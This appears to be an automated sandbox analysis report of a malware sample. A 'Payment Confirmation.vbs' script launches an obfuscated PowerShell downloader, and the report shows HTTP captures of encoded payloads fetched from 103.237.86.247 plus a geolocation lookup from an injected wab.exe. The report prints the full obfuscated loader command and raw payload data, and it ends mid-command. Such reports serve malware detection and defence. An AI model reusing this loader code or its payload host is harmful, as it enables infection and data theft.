                Jul 2, 2024 07:50:07.757961988 CEST896INData Raw: 67 79 48 32 37 34 78 55 32 35 45 62 2b 4f 30 4d 52 47 75 74 70 36 32 71 43 75 4d 50 76 58 61 4d 4b 6d 5a 57 44 30 66 67 32 4f 2b 33 38 36 4d 2f 74 2f 4f 6a 50 37 66 7a 6f 7a 2b 33 38 36 4d 2f 74 2f 4f 6a 50 37 66 7a 6f 7a 2b 35 51 77 68 48 53 58
                Data Ascii: gyH274xU25Eb+O0MRGutp62qCuMPvXaMKmZWD0fg2O+386M/t/OjP7fzoz+386M/t/OjP7fzoz+5QwhHSX7zKGhoWX+ZDjfi09hsG3U7Gu1306M/S4A637fzoz+386M/t/OjP7fzoz+386M/t/OjP7gDuKUGLOV0fwaovANF6Vzgg4vMVSfvqOjg+YzwqduuNPCeJkBxi3UMwBtcnC0KumqrM/jHias7//T5UR/LsgKk8LfPZSn
                Jul 2, 2024 07:50:07.758044958 CEST1236INHTTP/1.1 200 OK
                Content-Type: application/octet-stream
                Last-Modified: Mon, 01 Jul 2024 07:11:00 GMT
                Accept-Ranges: bytes
                ETag: "688d8ad385cbda1:0"
                Server: Microsoft-IIS/8.5
                Date: Tue, 02 Jul 2024 05:50:02 GMT
                Content-Length: 489948
                Data Raw: 63 51 47 62 36 77 49 72 73 37 76 32 2b 52 49 41 36 77 4a 6b 71 58 45 42 6d 77 4e 63 4a 41 54 72 41 72 55 6e 36 77 4a 79 45 72 6b 79 39 59 75 70 36 77 4b 2f 30 4f 73 43 30 46 57 42 77 5a 31 4a 52 55 78 78 41 5a 76 72 41 76 31 6c 67 66 48 50 50 74 48 31 36 77 4a 4d 6f 48 45 42 6d 2b 73 43 56 75 50 72 41 73 6a 32 75 6f 66 79 47 4b 2f 72 41 68 57 43 63 51 47 62 36 77 4a 6a 4c 6e 45 42 6d 7a 48 4b 63 51 47 62 36 77 4c 68 79 59 6b 55 43 33 45 42 6d 2b 73 43 4c 4b 54 52 34 6e 45 42 6d 33 45 42 6d 34 50 42 42 48 45 42 6d 2b 73 43 4d 61 4f 42 2b 63 71 34 64 77 46 38 7a 4f 73 43 41 32 64 78 41 5a 75 4c 52 43 51 45 36 77 4a 4a 73 48 45 42 6d 34 6e 44 36 77 4b 59 4d 58 45 42 6d 34 48 44 5a 6f 4e 55 41 48 45 42 6d 33 45 42 6d 37 6f 2b 34 5a 50 62 63 51 47 62 36 77 4c 6f 71 6f 48 79 44 71 41 44 67 58 45 42 6d 33 45 42 6d 34 48 79 4d 45 47 51 57 75 73 43 4e 38 35 78 41 5a 74 78 41 5a 76 72 41 6a 42 65 36 77 4b 33 56 75 73 43 5a 35 71 4c 44 42 44 72 41 71 67 4d 63 51 47 62 69 51 77 54 36 77 4c 4c 52 75 73 43 32 48 [TRUNCATED]
                Data Ascii: cQGb6wIrs7v2+RIA6wJkqXEBmwNcJATrArUn6wJyErky9Yup6wK/0OsC0FWBwZ1JRUxxAZvrAv1lgfHPPtH16wJMoHEBm+sCVuPrAsj2uofyGK/rAhWCcQGb6wJjLnEBmzHKcQGb6wLhyYkUC3EBm+sCLKTR4nEBm3EBm4PBBHEBm+sCMaOB+cq4dwF8zOsCA2dxAZuLRCQE6wJJsHEBm4nD6wKYMXEBm4HDZoNUAHEBm3EBm7o+4ZPbcQGb6wLoqoHyDqADgXEBm3EBm4HyMEGQWusCN85xAZtxAZvrAjBe6wK3VusCZ5qLDBDrAqgMcQGbiQwT6wLLRusC2H1C6wJZrOsCL4GB+gwhBQB10usCAh5xAZuJXCQM6wKl33EBm4HtAAMAAOsCIoLrAidYi1QkCHEBm+sCHMiLfCQE6wJA4XEBm4nrcQGb6wJE5oHDnAAAAHEBm+sCzjlTcQGbcQGbakBxAZvrArLHievrAgBrcQGbx4MAAQAAAMCNAXEBm+sC0tmBwwABAABxAZtxAZtTcQGb6wIMA4nrcQGb6wL51Ym7BAEAAHEBm3EBm4HDBAEAAHEBm+sCqwpT6wKf8esC9qlq/3EBm3EBm4PCBesCWTHrAu14MfZxAZtxAZsxyXEBm3EBm4sa6wI1lnEBm0FxAZtxAZs5HAp19OsCqV9xAZtG6wIwBOsCb9iAfAr7uHXd6wJM5OsCzmWLRAr8cQGbcQGbKfBxAZtxAZv/0usCsd7rAkbEugwhBQDrAiUp6wK8PzHA6wLjAusC1q+LfCQM6wIOBusCQnCBNAd/OjP7cQGb6wLw1oPABOsCZRDrAp9dOdB14+sCMvBxAZuJ+3EBm3EBm//X6wIUSnEBm//BMHKa/bb4gMXM7blD93rKOcwEgOy8XPy7hviAxcyyoAlWevo5zASATV/ponbMdnzFzAQKzWZymoN8B3SRsgrVXhv0/svjei8ishJiI0BHuH4++zawm9771b
                Jul 2, 2024 07:50:07.764355898 CEST1236INData Raw: 66 2b 2b 49 6e 6f 72 51 69 79 4f 61 6f 2f 4a 7a 58 2b 30 4c 54 4c 41 4f 52 69 5a 2f 62 62 4f 75 72 69 58 41 6f 49 42 68 37 69 6f 4c 31 41 5a 39 30 4f 6c 2f 51 56 76 57 55 61 74 70 6e 68 55 64 48 71 37 76 30 59 75 71 70 53 4e 2f 4c 52 6d 70 78 53
                Data Ascii: f++InorQiyOao/JzX+0LTLAORiZ/bbOuriXAoIBh7ioL1AZ90Ol/QVvWUatpnhUdHq7v0YuqpSN/LRmpxS5hg4iqsA20HnaYcMf+eFy/BVfqZjCzglgqhVoSn/ttp2AZwX6D9g/orNfqZFMxXgwy4MBJKSzRviGgI68DZIKib8zkM1aZ8ZNfTLfzoz+386M/t/OjP7fzoz+386M/t/OjP7f9Gtf83xi6uyhqjHxHmsu5PThYmo6
                Jul 2, 2024 07:50:07.764368057 CEST1236INData Raw: 69 72 78 31 45 54 6b 35 34 2f 67 6f 53 31 41 67 62 6e 33 67 67 70 71 75 4f 7a 30 76 70 2b 70 77 6f 73 43 6a 35 49 55 68 43 2b 6b 77 76 41 66 6c 59 57 36 6b 33 75 64 66 76 69 74 5a 71 4d 2b 4e 71 41 78 79 38 54 72 61 37 4b 5a 78 4c 57 2b 74 69 52
                Data Ascii: irx1ETk54/goS1Agbn3ggpquOz0vp+pwosCj5IUhC+kwvAflYW6k3udfvitZqM+NqAxy8Tra7KZxLW+tiR1UuIRCy7TosL5TP7cL6ZB3s6anqEzHOFT2KwP0dsjRRqtP96iagIBdO79WmNf8x6iaCTUQq73W7/Jhms47PU8kinVcKMQS69vxUNCKgY0nT9peZLPyu8it5J/1xWDE7A+dbMOucn/rJW5HOoxDQz+3+7yMTeZDj08
                Jul 2, 2024 07:50:07.764530897 CEST1236INData Raw: 6f 56 45 64 6a 65 47 31 6a 69 47 6c 33 65 4d 76 76 55 4f 35 63 50 6e 56 47 4b 46 71 51 72 4e 4c 38 75 6c 35 39 30 66 64 4c 5a 6f 6c 62 75 6c 34 4d 7a 2f 6e 39 70 69 45 72 70 78 2b 78 36 6a 41 69 46 43 53 57 37 77 50 53 2b 43 43 64 36 76 42 77 48
                Data Ascii: oVEdjeG1jiGl3eMvvUO5cPnVGKFqQrNL8ul590fdLZolbul4Mz/n9piErpx+x6jAiFCSW7wPS+CCd6vBwHDlK7wO05CYxyRNPEWox41Rpt31cO5OZT4Q5nBdNKk7wT5pfm5oOlEknqCjeKJLP0PPpnMft/yrvsbWmIUiWGMnqMf2iK2rvAF3/3l6njs9H6ZacLMAs9t0shJK2ZbxVGmoRTt4OuE1H4B+a1Jyvyu6FyxgNyEnUG+
                Jul 2, 2024 07:50:07.764646053 CEST1236INData Raw: 58 66 6b 2b 68 63 72 64 73 4c 38 78 37 79 2b 73 43 5a 32 4a 47 47 50 33 7a 56 6b 6b 65 75 68 2b 64 48 4f 5a 32 4a 7a 58 7a 53 53 31 63 6f 70 46 4a 66 59 43 6f 61 61 72 68 2b 69 44 73 7a 2b 79 2b 7a 74 6e 39 2b 4f 6a 4d 53 70 7a 6f 7a 2b 77 41 41
                Data Ascii: Xfk+hcrdsL8x7y+sCZ2JGGP3zVkkeuh+dHOZ2JzXzSS1copFJfYCoaarh+iDsz+y+ztn9+OjMSpzoz+wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                Jul 2, 2024 07:50:07.764657021 CEST1236INData Raw: 6e 4e 75 39 6e 57 78 53 41 53 65 6f 32 4c 73 49 35 4b 62 4b 39 79 6d 54 73 6c 5a 76 72 68 53 2b 75 67 2b 67 33 43 59 31 4e 6f 61 56 61 42 4a 53 30 44 49 76 30 49 58 74 66 6b 6c 37 76 61 2b 53 6e 4f 31 72 49 4b 5a 47 71 74 34 71 6c 74 68 75 74 32
                Data Ascii: nNu9nWxSASeo2LsI5KbK9ymTslZvrhS+ug+g3CY1NoaVaBJS0DIv0IXtfkl7va+SnO1rIKZGqt4qlthut2dsU94GQLOSW72ZqEcVn0uADg+386M/t/OjP7fzoz+386M/t/OjP7fzoz+4WJEwxE3GFBq7viTP7IJ7OL47I5Pw3pai+muht2Kq7DpkcYsymzMrGO9fJ0bkDBi5AiN8K6F/LaRtMyq9ik2uFU76k12xm5UPW4CQ6wm


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                1192.168.2.860018103.237.86.247806968C:\Program Files (x86)\Windows Mail\wab.exe
                TimestampBytes transferredDirectionData
                Jul 2, 2024 07:50:37.203871012 CEST178OUTGET /nsQUkTChtPKgp70.bin HTTP/1.1
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                Host: 103.237.86.247
                Cache-Control: no-cache
                Jul 2, 2024 07:50:38.210998058 CEST1236INHTTP/1.1 200 OK
                Content-Type: application/octet-stream
                Last-Modified: Mon, 01 Jul 2024 07:09:12 GMT
                Accept-Ranges: bytes
                ETag: "cdac9f9385cbda1:0"
                Server: Microsoft-IIS/8.5
                Date: Tue, 02 Jul 2024 05:50:32 GMT
                Content-Length: 494656
                Data Raw: 0c e9 8f 28 88 52 6e d4 3c 12 9c 59 eb 37 3a 65 6c d4 3f 75 35 53 a3 d0 75 b6 8b 43 23 af 48 94 4f 27 f4 89 9d 3e 63 e3 ff 23 be 41 96 c2 65 26 35 f4 70 e7 5c 76 2d a7 56 eb 92 31 85 00 29 8d 69 f2 a2 8e e6 65 a8 b7 18 b5 80 5b 44 43 70 ff a0 d6 4d 8b b3 cb 09 09 b5 1c b2 59 43 df 4b ce f1 e6 7c fe df b7 a8 58 a3 78 f8 2f 6b d8 4f 29 a5 f6 56 b5 b4 25 5d ad 89 57 b8 d7 ea d5 de 33 d9 be 33 1b 4f c0 6b c9 53 a0 d8 aa 58 15 9b fd e1 5b 80 bf 22 52 26 9c 69 39 7e d7 84 11 b0 d5 67 c7 af 82 43 6a 58 1f 82 90 8e 0f 73 d9 3d 9a ad 40 3e 4e 0d c5 86 aa 18 80 45 c3 45 44 44 7d ee 56 b4 a2 6c fe 42 d7 e1 38 7a 97 f1 c9 ed 80 38 05 04 8e 3d ec 44 4a 37 b8 3c a8 e1 51 f8 e0 cb d4 e2 18 a8 8b e4 63 5a 5c 28 8d ec 73 d7 aa d2 a6 f7 a5 d0 e1 bb fc 68 9d c7 af c7 e2 b3 8f 56 12 3a 32 56 68 4e e9 d4 64 00 08 34 eb 73 0b 8f 2a f9 5a ad ae e1 82 48 30 e8 23 a0 a5 b1 f7 47 e8 4b 0e 9b 62 e0 0d 2a 14 86 40 44 61 70 38 31 cd 30 80 a0 3d c9 1d ac d9 61 b6 a9 ef 47 bf 28 b3 cb fd 9c 11 02 98 63 b4 d4 99 12 14 66 20 b5 bd [TRUNCATED]
                Data Ascii: (Rn<Y7:el?u5SuC#HO'>c#Ae&5p\v-V1)ie[DCpMYCK|Xx/kO)V%]W33OkSX["R&i9~gCjXs=@>NEEDD}VlB8z8=DJ7<QcZ\(shV:2VhNd4s*ZH0#GKb*@Dap810=aG(cf eHH>KIQrB5|X:tk*iUNW"s,](#gL.&dx5!F>m_x.z4P}T]~&h*!Sfk,AT~3!p+w$p0"&\H4 E\{'*f!\hm|xLIi241&@[5XcKi=lFE9(&2C|b(mi@"^dKuJaug'E34K3oi1'jTv!2]-FUC~]0DcW1C3]WcO7>&RE-%z<W(zVQ7HL2c5]_4mHt8M53 R`B"tZjDuU_tbdNkt-:X4\:&7C`~Pqp|H!s~JYg-&kuD_u7F2#}i($.{cm=vv5
                Jul 2, 2024 07:50:38.211023092 CEST1236INData Raw: 7a 4e 6f 35 ee af d8 6c a4 e7 49 dc 4d 9c 2d e1 06 82 b1 c9 02 05 52 f1 86 19 20 01 27 60 44 51 61 c5 8c 34 17 b8 5a ce 2e 87 ad c0 e7 1d 30 6d 23 a6 6c 4b 2b 23 4c 54 45 70 c0 07 94 11 75 73 08 9e 0a 58 16 dd 40 93 cb 62 8f be 21 62 ec 70 a3 14
                Data Ascii: zNo5lIM-R '`DQa4Z.0m#lK+#LTEpusX@b!bpK)qlPrpP<g5;[k2xV$b78/4Gp3*z^5M>Ia_"w(w~c?h97D(?Yaj/FPAs8$3F7Lw/}Gjn"t
                Jul 2, 2024 07:50:38.211035013 CEST1236INData Raw: e1 7d b7 55 cd 63 f8 ad 43 f6 54 06 66 8e eb 7e b5 ac df 70 f3 fc 77 70 66 05 d6 b0 d1 02 31 2a 4d 59 e7 26 5d dd af 03 26 81 b7 57 cf fc c7 e2 0a c0 26 f4 2d ee 3e 7f 91 7e 9d a4 63 7a 14 8b 3d 62 5a 56 6f 96 60 81 41 01 3c 22 64 81 09 32 8c 79
                Data Ascii: }UcCTf~pwpf1*MY&]&W&->~cz=bZVo`A<"d2y47tD9 lUmmuu4/.0EKRF-|y49&I`gJ*~iC0bq)q.~A"l;rX:C=uksE@#q
                Jul 2, 2024 07:50:38.211045980 CEST1236INData Raw: a8 0e 09 f6 21 7d d8 e5 5b f6 1e 5d 96 60 7d f1 19 35 a7 f1 da 79 a1 e6 9e 48 d1 f2 4d 35 c0 2c 5b ca 3d d9 32 f6 85 6f fc 91 33 11 58 56 33 ac 3c ef 54 32 35 8f ae 05 3d 28 e6 0f 56 02 20 33 7e 9d 17 5c ef 88 c5 b3 10 8b fb c9 1b e0 20 96 e7 5c
                Data Ascii: !}[]`}5yHM5,[=2o3XV3<T25=(V 3~\ \9k\ eT*LkNXNRq47& [5'[K?yQ@'o&EF|b{CGm!FX>J_`gm#=cewai//'!&DcCC+6pq3
                Jul 2, 2024 07:50:38.211060047 CEST896INData Raw: ec 3f 1a 9a 01 64 c8 28 2c 16 c7 45 f0 85 e7 d4 57 a5 cd ac 1b 0e 43 97 0a 31 e8 e8 e9 1a af 12 b9 c4 9c 35 98 f2 53 91 5e eb 88 e5 e3 ce 81 6a 9e c8 a7 95 f2 bb 71 bc 51 3f ce 91 58 a5 89 02 8a 8f 19 b8 19 8e 1b 38 09 7c d1 9c d3 95 18 ed a5 97
                Data Ascii: ?d(,EWC15S^jqQ?X8|RYw^zlm=0>]XLpps=<;WQ$;6}y[=XW7+U)Ik-}8=@{y0e1y|r}g"<7(L&#O+Me&G{
                Jul 2, 2024 07:50:38.478319883 CEST1236INData Raw: 62 df b0 2a 17 c2 d9 1d 81 76 c4 2a af 86 06 94 ad 50 91 78 98 f9 6e 25 04 8f 0d 51 f4 21 70 46 3c bf b7 9b 40 e7 00 c3 30 ce df d5 da c7 cd 58 6b cb 14 36 f2 b7 8a db f8 39 5d b3 9d 5a c1 c0 05 70 db d8 d1 78 e8 f1 30 ab 02 ba 86 8c 79 a8 3f 4e
                Data Ascii: b*v*Pxn%Q!pF<@0Xk69]Zpx0y?NRLRFq7k'GH,F"h!QW|I/GanfY?P6<Dn.P(*3tD*xAC,;`c#:DG"r9
                Jul 2, 2024 07:50:38.478343964 CEST1236INData Raw: 98 82 da 04 37 b1 5d 67 0b 40 62 3a c3 08 1c 59 be 2d 31 3a 29 33 83 20 52 77 db 62 b0 8f d3 b5 94 b4 ad 10 ae 49 dd 1f 89 7c 1b 07 cf ba bd ae 2f 23 6e e7 7c bf 8a 36 25 ee 27 34 2e 93 aa ed f7 75 41 df a5 31 83 70 8e 3b d2 4b e5 9f d3 6c b0 4b
                Data Ascii: 7]g@b:Y-1:)3 RwbI|/#n|6%'4.uA1p;KlKrfjA>C^D*l7s P:Wpr9F@Hl9L]Z-2Y<2NLulMx}'(&=4L&a=c1=6R~d6jgl%Ac\zGvSDH:P%.&8
                Jul 2, 2024 07:50:38.478353977 CEST448INData Raw: 96 22 90 58 fb ff 2d 5d 56 1a f0 fd a2 19 fc 81 d1 56 31 46 e2 8e c4 5e 1a 68 e4 db 00 40 59 96 83 a7 71 48 e9 4a e2 b8 bb bb ff 8d f2 57 4e 33 55 76 26 c2 0b a8 5c ad ca 30 d3 85 d7 b2 47 18 fd 48 55 5d 6b fc ba 44 0d bd aa b0 dc 06 a4 26 19 b1
                Data Ascii: "X-]VV1F^h@YqHJWN3Uv&\0GHU]kD& ue4t,4J}sSQCt1& p [YS,Sd74<oTg{U.$np.Rqe*FC\%R#"qw<qEmU
                Jul 2, 2024 07:50:38.478358984 CEST1236INData Raw: d2 01 1a b3 0d d6 e8 09 62 ee 91 f7 90 7b fb 4e 19 b9 9e c3 6b 85 b1 e4 fd 06 9f d9 6c a4 6e 0c 30 ce d1 d1 1e ed ba 38 ac f2 8e 17 f9 0f 5c 28 c7 62 9c 46 11 31 4e c1 dc ff 77 ae 31 d1 0c 65 28 ee 1c 30 6d aa e3 80 8c 6e df 4d 54 45 70 78 5c b9
                Data Ascii: b{Nkln08\(bF1Nw1e(0mnMTEpx\Quj-7G|Ue<*%/?H2uy^D7:Ip6Oqb;/g$\9/5y;LAkUWb+_1hfJN'nl,GQw/oo(F~
                Jul 2, 2024 07:50:38.478364944 CEST1236INData Raw: ed a6 27 5e 14 66 c3 2f 82 fb e0 f6 c0 ac 81 5d c2 a4 a7 94 ba 71 32 a2 bd 2b 63 35 51 13 22 da b7 e6 5e ad 7e 5d a8 58 be 1b 3c 53 f1 23 8e f8 35 68 e4 6c b1 9e 33 8d 60 b7 84 17 77 ea c5 d4 bf 08 96 e8 63 8d c8 ce 61 e0 99 1a 2e d9 e7 ad 1c c6
                Data Ascii: '^f/]q2+c5Q"^~]X<S#5hl3`wca..v<,R7H2E]T,18p8MJSVl.SMtkrL*#_PAS.N+?`<26rfcvKs)IUzQ{)(VXsmen8&F ._c
                Jul 2, 2024 07:50:38.478370905 CEST1236INData Raw: 5b 20 fc 8b ae 38 6c 58 4f e0 b0 5b d5 f4 60 b5 4e d7 7e ea dc 54 fc af 82 7a 3e df 39 2f 9b f5 a2 81 af 2c d5 0d e7 3c aa 9d 02 54 5d 51 3e 9f 49 66 3c fa a9 fd 35 d0 3e 7e 81 6a 49 3f 72 c3 ee fe 59 23 55 5f 40 50 fe af cd 46 29 8f 5c c9 09 d4
                Data Ascii: [ 8lXO[`N~Tz>9/,<T]Q>If<5>~jI?rY#U_@PF)\`6I'hKCD.X&V1uGag15d&Agz|U:by?6C(UfMTMI2c+?g`Qt95UXyb-V+


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                2192.168.2.860024178.237.33.50806968C:\Program Files (x86)\Windows Mail\wab.exe
                TimestampBytes transferredDirectionData
                Jul 2, 2024 07:50:45.679673910 CEST71OUTGET /json.gp HTTP/1.1
                Host: geoplugin.net
                Cache-Control: no-cache
                Jul 2, 2024 07:50:46.290402889 CEST1170INHTTP/1.1 200 OK
                date: Tue, 02 Jul 2024 05:50:46 GMT
                server: Apache
                content-length: 962
                content-type: application/json; charset=utf-8
                cache-control: public, max-age=300
                access-control-allow-origin: *
                Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                Click to jump to process

                Click to jump to process

                Click to dive into process behavior distribution

                Click to jump to process

                Target ID:0
                Start time:01:50:01
                Start date:02/07/2024
                Path:C:\Windows\System32\wscript.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment Confirmation.vbs"
                Imagebase:0x7ff782d90000
                File size:170'496 bytes
                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:2
                Start time:01:50:03
                Start date:02/07/2024
                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Wow64 process (32bit):false
                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Viljestrk Taxies Datch Unexplosively Unclipper opsadlede Knox Byguerillaernes Dragen Fyrstehoffernes Psocids Thetarytme Dommerklub Antidoted Bacteroides47 Foerstedel Rendzina Definitionsmngderne244 Forngterens Tillgsbetalings Siris Reproducerer Skovfogedblerne Credo Viljestrk Taxies Datch Unexplosively Unclipper opsadlede Knox Byguerillaernes Dragen Fyrstehoffernes Psocids Thetarytme Dommerklub Antidoted Bacteroides47 Foerstedel Rendzina Definitionsmngderne244 Forngterens Tillgsbetalings Siris Reproducerer Skovfogedblerne Credo';If (${host}.CurrentCulture) {$Banderillero++;}Function Mashlin($Corban){$Goosing=$Corban.Length-$Banderillero;$Solubilities180='SUBsTRI';$Solubilities180+='ng';For( $aflvningsmiddels=7;$aflvningsmiddels -lt $Goosing;$aflvningsmiddels+=8){$Viljestrk+=$Corban.$Solubilities180.Invoke( $aflvningsmiddels, $Banderillero);}$Viljestrk;}function Catholicate($Lyncine){ . ($Svinske25) ($Lyncine);}$Sikhens=Mashlin ' RugenbMItalienoKdery,ezBefugteiPh,tololFhovedel.udgerealserund/Koasuta5 Bribeg.Clearhe0Underud Lolansp(kamgavlWMawingriOverfo.n Overp dGnarredoopportuw.ahabeas Preemp Ant nagNEf.erspT Preter Blinde1Utaalmo0Parkeri.Fontina0E rthin; onabso .ortidsWf iktioiG,uppeanNonconc6Aracari4 Abbots;R aensb Trinervx Moni,o6Observ.4 Brepil;Sognefo Cyc,otrH.lautov Lssene:Polyes.1Prkener2 Allahc1jongl,r. Reinco0 Deduct)Gleaned T easurGkautionePoli urc Tpdherk Sukkerocarpopo/Fa litt2Gordyfy0Desilve1 Langpl0Coconsc0Senatus1Parapla0Mercify1 tartb Underb,FOverhrti Religirmodulate Statssf ChieftoBortforxLogfile/ Unclin1Flyttel2Nepotis1Bverr t.Dis ppo0Sammens ';$Sensationer=Mashlin 'SolingkUCell.resSkybrude,nshakerScandal- CentimAp,eoccugParad.ne LimphanEffluent Pla.tp ';$Unclipper=Mashlin ' SkrifthSk.lepat vangsftOverextp Snren :Digebru/ Brugsv/Stenion1sandema0 K mmar3Drikkes.Talioni2Sacr me3General7postco,.V,relag8E,cyoff6elfenbe.Adfrds.2Mijn,ee4Colorif7Semiana/SkrigedDTaksatiaSprogbrg Succ.dustilleveIverensrAgrafedr.ehndige TusindoDeaminatj,nerelyBequotep Atriumi FrownsePushilyrM usehanSarinoseaabentvsNoug,te.CockpitfM,slinglW.istwaakuratel ';$Gesjftigstes=Mashlin '.acemak>Coglori ';$Svinske25=Mashlin ' U,ilisiSundhedeMedmennxPr,stit ';$Bmw='Byguerillaernes';$Anskaffedes = Mashlin 'Isblokke Opht.acMadnesshPryglero Dep le Prevari%H ircapaSuggestpCivilbepFrbaadedGuldfataindm,dstOvergloaFarve.r%Fuldebd\BunddkkRgemmedmePreinven Shi kioIntensiwFo,staanEuroomre.nstrukrA.ylate.Manged S Rds,lsuBuf,erenUdlgger Sterr.t&Barna,t&Usselve WhissleeWrassesc,loweryhInkstonoLi,uori Lys,pritSko are ';Catholicate (Mashlin 'Obs.etr$GasbagggUnpleaslMediat.o ViniesbOutplacaUd ullelPharmac:.aferwohRefu,biaMek.niss.lveaartMe struiSkorstegSvengalhGatedhaeNonfecudkrigsspeSydste.rVariabe=Kontoku(Hallucic Su fitmBlackbudSkresta Undece/VerdenscFarmin, Hordeol$E,rwigsAsnep,ovn Disnums elikatkF,ortenaBahamanfEjerbolf NyligeeChastendSoterioeVirrerusEqui,on) Rigdom ');Catholicate (Mashlin 'telefon$Uncomf gSpoofislHalvfjeosideshabSabiania Soci,llDiverto:Deth,onUGenoplinLivsbeteS.ongilxL,vsfarpDoyzarrlForstuvoHanernesP,ykiatiChar.ervE.ternaeCookedmlm,rdentyF.sions=Residen$ CentraU Brud,un.eshadoc D.wfallUnianguiAlpinisp Grabekp Somm,re,rogenerOmdigtn.Fa vetasVentrikp.obakshlA,veolaiCrojikst Konsta( Brasek$UnderbeGPaaseteeSynapsis.lkenslj ,elegof ChifrytInfraociGen.ancg TribunsUnfussitDiv,rsiesmertinsTypo.ra)Snrlive ');Catholicate (Mashlin 'Blok,lj[Klis erNSnapsefeTapp.mat Reetab.BasiskoS,ormindeExtoll,rKaprifov SstersielektrochomoeopeU prompPpseu,opoPersonaiNonlogin Prema tslippetMStravaia ArbejdnBefriela OrenesgDimercueTyfonsmrBikukul]Estrago:Kanonfo:NavneliSSolkre.eE,travecAgamospuTildragrKortadri Nu,erit TacklyyspriggaPB ikettrChironooDelkoratskae,tgoHistoricMiljre oEcoddamlDispers Landstn=Charpie Loranst[ NewsbeNEnchyleeKurchattRrggent.Balla eSCyanaceeBevidnec dongo uPaperinr .edasci Ac.tyltGiftek,yR,troreP RaymunrElmaal.oAbandontHypnoloo OverarcUtri ulohjernehlMarkedsTIspellcyMonsoonpBali,tieDefendr]Subthri:Syldste:AficionTE captilMurg onsoverhea1 yrefab2Bangalo ');$Unclipper=$Unexplosively[0];$Flourishingly= (Mashlin ' Materi$Kaskadeg odsinlSjl,helo ftersobGun,tigaLonersolSynch,o:SerpentMPu,likueNdringslbarryggoBortratdSpgelsei,induessFejludseReshipm=UomgngeNKoaguleeS.ecifiwLegater-CocoforOUrligtcbReseratjSciaenie bolledcKnobstitOdor.nt TromlebS Aperieyout,abbsAdvantatRyatp,eeLamellamPreexpe. MiddelNn ntheieperistot Shrubl.BundfryWUnobstreNon iscbbrahmanCRegentelMora.doiVlverneeKollagenAnteda,t');$Flourishingly+=$hastigheder[1];Catholicate ($Flourishingly);Catholicate (Mashlin 'lim alk$AfgrdenMSuperpreboolskelhu,rsygo,bessindGringeriZebuernsRis ersetwanaer.IndesneHHundr,de ikseanasubtrakd,aspiste Bi,ephrNonrespsAirplan[Dansemu$KabellgSTolkereeFor undnSkotjsfs.retaniaA.lurintVulcanaiParakeeoCoscetbnUrukueneEphemerrLukewa,]Sp,radi=Magnhi.$chill mSOvercuri Macrurk Reconvh SammeneSkakt kn rigs,ms Noneli ');$Samleskinner=Mashlin 'Myrtilu$AutobioMDe.elopeUdarmerl Anato.o ParlamdtriglyciU,loadusKienanueN.veauo.IndvandDUncoloroSkovbruwindholdnPneuma,lUpthr woOvergana Cotu.adPatientFObje.tiiIfeck.fl Datasee Agency(percept$SidelinUB.learinNicholacPachydelTopiskei rimesypDelftwapErstatneOuteatcrpreflig,C mpute$WilhelmRBarounieRivet ep Brode.rBronchooRielnitd,eallnsuAr,uatecV ldfrte Pe iodr OpmagaeGodtgrerDumbbel)Frerpr ';$Reproducerer=$hastigheder[0];Catholicate (Mashlin 